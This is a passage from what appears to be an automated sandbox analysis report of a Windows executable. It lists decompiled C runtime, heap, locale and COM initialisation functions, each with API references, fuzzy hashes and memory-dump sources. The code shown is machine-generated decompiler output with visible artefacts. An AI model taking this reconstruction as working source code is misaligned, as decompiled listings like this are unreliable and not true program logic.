                          • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__wsetargv__wsetenvp__wwincmdln
                          • String ID:
                          • API String ID: 965155184-0
                          • Opcode ID: b5ab956eed20f05a372d2e83b1aff10c2784c03741205e7fd92235a5aedd176e
                          • Instruction ID: 1f4328fb1270815b40bd831efc690f2a02e652aff3e1c4de0287aedc37cef172
                          • Opcode Fuzzy Hash: b5ab956eed20f05a372d2e83b1aff10c2784c03741205e7fd92235a5aedd176e
                          • Instruction Fuzzy Hash: B111BC20204316AAFA607BF89C46B6B2A44FF13354F240C7AFA40DACC3EFA9C4415223
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040438F
                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                          • VariantInit.OLEAUT32(?), ref: 004043C4
                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                          • VariantInit.OLEAUT32(?), ref: 00404414
                          • SysAllocString.OLEAUT32(?), ref: 00404419
                          • VariantInit.OLEAUT32(?), ref: 00404431
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                          • String ID:
                          • API String ID: 1312198159-0
                          • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                          • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                          • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008AEDFA Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 84%
                          			E008AEDFA(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long* _t12;
				long _t14;
				void* _t19;
				void* _t21;
				void* _t25;
				long* _t26;

				E008AEFA9(_t3, __ebx, __eflags);
				if(E008B02BA() != 0) {
					_t6 = E008AFB16(0x8aeb8b);
					 *0x8be000 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t26 = E008B0340(1, 0x3bc);
						asm("lock pop ecx");
						_t19 = _t25;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							E008AEE70();
							__eflags = 0;
							return 0;
						} else {
							_t12 = E008AFB72(_t19,  *0x8be000, _t26);
							_pop(_t21);
							__eflags = _t12;
							if(__eflags == 0) {
								goto L7;
							} else {
								_push(0);
								_push(_t26);
								E008AED47(__ebx, _t21, __edi, _t26, __eflags);
								_t14 = GetCurrentThreadId();
								_t26[1] = _t26[1] | 0xffffffff;
								 *_t26 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E008AEE70();
					return 0;
				}
			}












                          0x008aedfa
                          0x008aee06
                          0x008aee15
                          0x008aee1a
                          0x008aee20
                          0x008aee23
                          0x00000000
                          0x008aee25
                          0x008aee32
                          0x008aee33
                          0x008aee35
                          0x008aee36
                          0x008aee38
                          0x008aee67
                          0x008aee67
                          0x008aee6c
                          0x008aee6f
                          0x008aee3a
                          0x008aee41
                          0x008aee47
                          0x008aee48
                          0x008aee4a
                          0x00000000
                          0x008aee4c
                          0x008aee4c
                          0x008aee4e
                          0x008aee4f
                          0x008aee56
                          0x008aee5c
                          0x008aee60
                          0x008aee64
                          0x008aee66
                          0x008aee66
                          0x008aee4a
                          0x008aee38
                          0x008aee08
                          0x008aee08
                          0x008aee08
                          0x008aee0f
                          0x008aee0f

                          APIs
                          • __init_pointers.LIBCMT ref: 008AEDFA
                            • Part of subcall function 008AEFA9: EncodePointer.KERNEL32(00000000,?,008AEDFF,008AE8DA), ref: 008AEFAC
                            • Part of subcall function 008AEFA9: __initp_misc_winsig.LIBCMT ref: 008AEFC7
                            • Part of subcall function 008AEFA9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008AFC2C
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008AFC40
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008AFC53
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008AFC66
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008AFC79
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008AFC8C
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008AFC9F
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008AFCB2
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008AFCC5
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008AFCD8
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008AFCEB
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008AFCFE
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008AFD11
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008AFD24
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008AFD37
                            • Part of subcall function 008AEFA9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008AFD4A
                          • __mtinitlocks.LIBCMT ref: 008AEDFF
                          • __mtterm.LIBCMT ref: 008AEE08
                            • Part of subcall function 008AEE70: DeleteCriticalSection.KERNEL32(?,?,?,?,008AEE6C), ref: 008B01D4
                            • Part of subcall function 008AEE70: _free.LIBCMT ref: 008B01DB
                            • Part of subcall function 008AEE70: DeleteCriticalSection.KERNEL32(008BE050,?,?,008AEE6C), ref: 008B01FD
                          • __calloc_crt.LIBCMT ref: 008AEE2D
                          • __initptd.LIBCMT ref: 008AEE4F
                          • GetCurrentThreadId.KERNEL32(008AE8DA), ref: 008AEE56
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 3567560977-0
                          • Opcode ID: 318c54c34e44141bd607e003ac57ec6568834ccea85a06a08caeee8484214a81
                          • Instruction ID: 5818addd167e8e74cf8e56be3865739bf0e1a63963f318d768295572e4e5bb10
                          • Opcode Fuzzy Hash: 318c54c34e44141bd607e003ac57ec6568834ccea85a06a08caeee8484214a81
                          • Instruction Fuzzy Hash: 0FF0B432245B111AF6243B7CBC1B74B3681FB03730F200E29F161D99E2EF2094124552
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008AEE8D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 16%
                          			E008AEE8D(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                          0x008aee91
                          0x008aee9c
                          0x008aeea4
                          0x008aeeae
                          0x008aeeb6
                          0x00000000
                          0x008aeebb
                          0x008aeeb6
                          0x008aeec0

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,008AEECC,00000000,?,008B23C4,000000FF,0000001E,00000000,00000000,00000000,?,008B039E), ref: 008AEE9C
                          • GetProcAddress.KERNEL32(?,CorExitProcess,?,?,008AEECC,00000000,?,008B23C4,000000FF,0000001E,00000000,00000000,00000000,?,008B039E,00000000), ref: 008AEEAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 1646373207-1276376045
                          • Opcode ID: 249d69c3c2c87243973d28c7d34586873538a97f8847c1984ca131c15fd21474
                          • Instruction ID: db02c1f7bbd13a958da40bc1a58c1b6aab34935f565b77e06af8b5886e02d989
                          • Opcode Fuzzy Hash: 249d69c3c2c87243973d28c7d34586873538a97f8847c1984ca131c15fd21474
                          • Instruction Fuzzy Hash: 44D01230A44208BBDB115B91DC05F9A776DFB01741F040564FE58D5590DB719A149650
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008B458A Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008B458A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E008B0791( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E008B44CC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E008B10B7(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                          0x008b4592
                          0x008b4597
                          0x008b45b1
                          0x00000000
                          0x008b45b1
                          0x008b4599
                          0x008b459e
                          0x00000000
                          0x00000000
                          0x008b45a3
                          0x008b45c0
                          0x008b45c5
                          0x008b45c8
                          0x008b45cf
                          0x008b45ee
                          0x008b45f5
                          0x008b45f7
                          0x008b463b
                          0x008b464a
                          0x008b4658
                          0x008b465a
                          0x008b466a
                          0x008b466a
                          0x008b466e
                          0x008b4670
                          0x008b4673
                          0x008b4673
                          0x008b4673
                          0x008b4673
                          0x00000000
                          0x008b4679
                          0x008b465c
                          0x008b465c
                          0x008b4661
                          0x008b4661
                          0x008b4664
                          0x00000000
                          0x008b4664
                          0x008b45f9
                          0x008b45fc
                          0x008b4600
                          0x008b4629
                          0x008b4629
                          0x008b462c
                          0x008b462c
                          0x00000000
                          0x00000000
                          0x008b462e
                          0x008b4632
                          0x00000000
                          0x00000000
                          0x008b4634
                          0x008b4634
                          0x00000000
                          0x008b4634
                          0x008b4602
                          0x008b4605
                          0x00000000
                          0x00000000
                          0x008b4609
                          0x008b461c
                          0x008b4622
                          0x008b4625
                          0x008b4627
                          0x00000000
                          0x00000000
                          0x00000000
                          0x008b4627
                          0x008b45d1
                          0x008b45d4
                          0x008b45d6
                          0x008b45db
                          0x008b45db
                          0x008b45e0
                          0x00000000
                          0x008b45e0
                          0x008b45a5
                          0x008b45aa
                          0x008b45ae
                          0x008b45ae
                          0x00000000

                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B45C0
                          • __isleadbyte_l.LIBCMT ref: 008B45EE
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B461C
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 008B4652
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 6b240b56edede272b571c86c1ffde9a1f4641c8eee282ae4ba3bd2cf56c8d29b
                          • Instruction ID: b94b253cd542ed38b82e61e7192ea3bbd12b33aa9e81b9c686609f39ed242f49
                          • Opcode Fuzzy Hash: 6b240b56edede272b571c86c1ffde9a1f4641c8eee282ae4ba3bd2cf56c8d29b
                          • Instruction Fuzzy Hash: 3D31D03060065AAFEB218F79CC46BFA7BB5FF42350F155529E864C72A2E730E854DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008B2429 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E008B2429(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x8bf100, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x8bff38 - _t7;
								if(__eflags == 0) {
									_t9 = E008B10B7(__eflags);
									 *_t9 = E008B10CA(GetLastError());
									goto L17;
								} else {
									__eflags = E008B13B0(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E008B10B7(__eflags);
										 *_t12 = E008B10CA(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E008B13B0(_t6, _t31);
						 *((intOrPtr*)(E008B10B7(__eflags))) = 0xc;
						goto L12;
					} else {
						E008B0308(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E008B2397(__ebx, __edx, __edi, _a8);
				}
			}









                          0x008b2430
                          0x008b243e
                          0x008b2441
                          0x008b2443
                          0x008b2452
                          0x008b2485
                          0x008b2485
                          0x008b2488
                          0x00000000
                          0x00000000
                          0x008b2455
                          0x008b2457
                          0x008b2459
                          0x008b2459
                          0x008b2459
                          0x008b2466
                          0x008b246c
                          0x008b246e
                          0x008b2470
                          0x008b24d0
                          0x008b24d0
                          0x008b2472
                          0x008b2472
                          0x008b2478
                          0x008b24ba
                          0x008b24ce
                          0x00000000
                          0x008b247a
                          0x008b2481
                          0x008b2483
                          0x008b24a2
                          0x008b24b6
                          0x008b249c
                          0x008b249c
                          0x008b249c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x008b2483
                          0x008b2478
                          0x00000000
                          0x008b249e
                          0x008b248b
                          0x008b2496
                          0x00000000
                          0x008b2445
                          0x008b2448
                          0x008b244e
                          0x008b244e
                          0x008b249f
                          0x008b24a1
                          0x008b2432
                          0x008b243c
                          0x008b243c

                          APIs
                          • _free.LIBCMT ref: 008B2448
                            • Part of subcall function 008B2397: __FF_MSGBANNER.LIBCMT ref: 008B23AE
                            • Part of subcall function 008B2397: __NMSG_WRITE.LIBCMT ref: 008B23B5
                            • Part of subcall function 008B2397: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,008B039E,00000000,00000000,00000000,00000000,?,008B0253,00000018,008BCE98), ref: 008B23DA
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: AllocHeap_free
                          • String ID:
                          • API String ID: 1080816511-0
                          • Opcode ID: 02115ea06127abb5c6a41f910a8904db0b355bb0f958777a09a344ef4b836d10
                          • Instruction ID: f0aa836b5b536b0d6639989ecb9ac4590cd3c53bf8cec690e951bc032c7541af
                          • Opcode Fuzzy Hash: 02115ea06127abb5c6a41f910a8904db0b355bb0f958777a09a344ef4b836d10
                          • Instruction Fuzzy Hash: 22110632500A15EFCF203F78AC08BDA37D8FF14364F104625FA48DEBA1EA3588818699
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008B5DFD Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008B5DFD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E008B634E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E008B5E83(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E008B65C9(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E008B6508(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                          0x008b5e00
                          0x008b5e06
                          0x008b5e79
                          0x00000000
                          0x008b5e0d
                          0x008b5e0d
                          0x008b5e10
                          0x008b5e2b
                          0x008b5e2e
                          0x008b5e4e
                          0x008b5e60
                          0x008b5e30
                          0x008b5e30
                          0x008b5e33
                          0x00000000
                          0x008b5e35
                          0x008b5e47
                          0x008b5e47
                          0x008b5e33
                          0x008b5e7e
                          0x008b5e82
                          0x008b5e12
                          0x008b5e2a
                          0x008b5e2a
                          0x008b5e10

                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction ID: 52323a7aeb8314376a3117bedf4e11b5d1e225a609a33d4a0d7b72315e6ec6a5
                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction Fuzzy Hash: 8201087240054EBBCF225E98CC41DEE3F66FB1C354B598415FA1899235D336DAB1AB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A2AC1 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E008A2AC1(void* __eax, void* __esi) {
				intOrPtr _t8;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;

				_t17 = __esi + 1;
				_t20 = __eax + 1 -  *0x8bed30; // 0x8bfc08
				if(_t20 != 0) {
					E008B0308(_t5);
				}
				_t21 =  *((intOrPtr*)(_t17 + 0x44)) -  *0x8bed34; // 0x8bfc08
				if(_t21 != 0) {
					E008B0308(_t6);
				}
				_t22 =  *((intOrPtr*)(_t17 + 0x48)) -  *0x8bed38; // 0x8bfc08
				if(_t22 != 0) {
					E008B0308(_t7);
				}
				_t8 =  *((intOrPtr*)(_t17 + 0x4c));
				_t23 = _t8 -  *0x8bed3c; // 0x8bfc08
				if(_t23 != 0) {
					_t8 = E008B0308(_t8);
				}
				return _t8;
			}









                          0x008b2600
                          0x008b2602
                          0x008b2608
                          0x008b260b
                          0x008b2610
                          0x008b2614
                          0x008b261a
                          0x008b261d
                          0x008b2622
                          0x008b2626
                          0x008b262c
                          0x008b262f
                          0x008b2634
                          0x008b2635
                          0x008b2638
                          0x008b263e
                          0x008b2641
                          0x008b2646
                          0x008b2649

                          APIs
                          • _free.LIBCMT ref: 008B260B
                            • Part of subcall function 008B0308: HeapFree.KERNEL32(00000000,00000000), ref: 008B031C
                            • Part of subcall function 008B0308: GetLastError.KERNEL32(00000000,?,008AED38,00000000,008B10BC,008B7791,00000000,?,008B688D,00000000,00010000,00030000,?,008B4AE7), ref: 008B032E
                          • _free.LIBCMT ref: 008B261D
                          • _free.LIBCMT ref: 008B262F
                          • _free.LIBCMT ref: 008B2641
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669464683.00000000008BE000.00000008.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669470976.00000000008C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_8a0000_xmtxpy.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 25b42ed8889a5afab1f3351924d049d24a8b292386ec0a623a96f03d2346be71
                          • Instruction ID: 43e15a15d5b96cb2ff248fd7215bf6be304855f98b2f329056588cc4e60cfb3e
                          • Opcode Fuzzy Hash: 25b42ed8889a5afab1f3351924d049d24a8b292386ec0a623a96f03d2346be71
                          • Instruction Fuzzy Hash: 33E092321952149FD614EBACF9CA8DB33ECF6193107740C05F085C7320D625F8804B25
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 008A592D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 61%
                          			E008A592D(intOrPtr* __eax, void* __edx, void* __edi, void* __esi) {
				signed int _v4;
				signed int _t7;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t29;
				signed int _t31;
				void* _t35;
				void* _t36;

				_t25 = __edi;
				_t24 = __edx;
				 *__eax =  *__eax + __eax;
				_t36 = _t35 + 0xc;
				if(__eax != 0) {
					L9:
					_push(_t19);
					_push(_t19);
					_push(_t19);
					_push(_t19);
					_push(_t19);
					E008B1058(_t19, _t24);
					asm("int3");
					_push(_t31);
					_t7 = _v4;
					 *0x8bf418 = _t7;
					return _t7;
				} else {
					_t8 = E008B193E(0x8bf452);
					_pop(_t21);
					if(_t8 + 1 <= 0x3c) {
						L4:
						_t10 = E008B19EB(0x8bf420, 0x314, L"\n\n");
						_t36 = _t36 + 0xc;
						if(_t10 != 0) {
							goto L9;
						} else {
							_t11 = E008B19EB(0x8bf420, 0x314, _t25);
							_t36 = _t36 + 0xc;
							_t43 = _t11;
							if(_t11 != 0) {
								goto L9;
							} else {
								E008B1B15(_t21, _t24, _t43, 0x8bf420, L"Microsoft Visual C++ Runtime Library", 0x12010);
								_pop(_t20);
								_pop(_t26);
								_pop(_t29);
								return E008B1CFB(_t20, _v4 ^ _t31, _t24, _t26, _t29);
							}
						}
					} else {
						_t21 = 0x8bf3dc + E008B193E(0x8bf452) * 2;
						_t18 = E008B1A57(0x8bf3dc + E008B193E(0x8bf452) * 2, __esi - (0x8bf3dc + E008B193E(0x8bf452) * 2 - 0x8bf452 >> 1), L"...", 3);
						_t36 = _t36 + 0x14;
						if(_t18 != 0) {
							goto L9;
						} else {
							goto L4;
						}
					}
				}
			}


















                          0x008a592d
                          0x008a592d
                          0x008af882
                          0x008af884
                          0x008af889
                          0x008af985
                          0x008af985
                          0x008af986
                          0x008af987
                          0x008af988
                          0x008af989
                          0x008af98a
                          0x008af98f
                          0x008af990
                          0x008af993
                          0x008af996
                          0x008af99c
                          0x008af88f
                          0x008af894
                          0x008af89a
                          0x008af89e
                          0x008af8d5
                          0x008af8e5
                          0x008af8ea
                          0x008af8ef
                          0x00000000
                          0x008af8f5
                          0x008af8fc
                          0x008af901
                          0x008af904
                          0x008af906
                          0x00000000
                          0x008af908
                          0x008af913
                          0x008af974
                          0x008af978
                          0x008af97b
                          0x008af984
                          0x008af984
                          0x008af906
                          0x008af8a0
                          0x008af8b1
                          0x008af8c5
                          0x008af8ca
                          0x008af8cf
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x008af8cf
                          0x008af89e

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669434494.00000000008A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008A0000, based on PE: true
                          • Associated: 00000006.00000002.669427489.00000000008A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000006.00000002.669456673.00000000008B9000.00000002.00000001.01000000.00000005.sdmpDownload File
